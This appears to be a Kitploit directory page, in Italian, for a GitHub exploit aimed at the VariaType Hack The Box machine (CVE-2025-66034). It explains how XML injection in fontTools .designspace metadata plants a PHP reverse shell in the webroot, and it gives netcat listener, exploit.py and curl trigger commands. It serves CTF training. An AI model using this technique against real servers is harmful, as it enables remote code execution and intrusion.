Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-66034-htb-ctf — Exploit per la macchina VariaType HTB sfruttando XML injection in fontTools per ottenere RCE tramite payload PHP reverse shell nei metadati .designspace. | Kitploit
Strumenti/GitHubGitHub/jwsly12/cve-2025-66034-htb-ctf
Generazione di PayloadExploitSfruttamento di Applicazioni WebCTFPenetration TestingApprendimento e Formazione
GitHubjwsly12/cve-2025-66034-htb-ctf

CVE-2025-66034-htb-ctf

Exploit per la macchina VariaType HTB sfruttando XML injection in fontTools per ottenere RCE tramite payload PHP reverse shell nei metadati .designspace.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
1235 mesi faNon ancora revisionato
Condividi

CVE-2025-66034-htb-ctf

VariaType Exploit del Generatore di Font Variabili

Questo repository contiene un exploit specializzato per la macchina VariaType su Hack The Box. L'exploit sfrutta una vulnerabilità nel modo in cui la libreria fontTools o l'applicazione web gestisce i file XML .designspace e l'interpolazione dei metadati per ottenere Esecuzione Remota di Codice (RCE).

📝 Descrizione

La vulnerabilità risiede nel processo di generazione dei font. Creando un file designspace malevolo, possiamo iniettare un payload di reverse shell PHP nei metadati del font (in particolare nel campo <labelname>). Quando il server elabora questi file per generare un font variabile, scrive l'output in un percorso definito dall'utente, permettendoci di depositare una shell .php nella webroot.

🛠️ Caratteristiche

  • Generazione Automatica dei Font: Crea font master validi source-light.ttf e source-regular.ttf usando fontTools.
  • Iniezione XML: Genera un file designspace malevolo con un payload PHP racchiuso in CDATA.
  • Path Traversal/Scrittura Arbitraria di File: Tenta di salvare il "font" risultante come file .php nella directory pubblica.
  • Randomizzazione: Genera nomi di shell unici per evitare conflitti.

🚀 Requisiti

È necessario avere Python 3 installato insieme alle seguenti librerie:

root@kitploit:~
pip install fontTools requests

💻 Utilizzo

1. Avvia il listener

Sulla tua macchina locale (o Pwnbox), avvia un listener Netcat:

root@kitploit:~
nc -lvnp 4444

2. Esegui l'exploit

Esegui lo script fornendo il tuo IP VPN HTB e la porta del listener:

root@kitploit:~
python3 exploit.py --ip <YOUR_IP> --port 4444

3. Attiva la shell

Se l'upload restituisce un 200 OK (o a volte anche un 500 se l'elaborazione avviene prima dell'errore), lo script fornirà il nome del file. Accedilo tramite curl o il tuo browser:

root@kitploit:~
curl http://portal.variatype.htb/shell_xxxxxx.php

⚙️ Argomenti

ArgomentoDescrizioneDefault
--ipIl tuo IP listener (VPN)Obbligatorio
--portLa tua porta listenerObbligatorio
--pathPercorso di destinazione per la shell/var/www/portal.variatype.htb/public
--urlL'endpoint di uploadhttp://variatype.htb/tools/.../process

⚠️ Disclaimer

Questo script è destinato esclusivamente a scopi educativi e test di penetrazione autorizzati. Accedere o attaccare target senza previa autorizzazione è illegale.


Come utilizzare questo README:

  1. Salva il contenuto sopra come README.md nella stessa cartella del tuo script.
  2. Assicurati che il tuo script sia chiamato exploit.py o aggiorna il nome del file nei comandi sopra.
Scarica lo strumento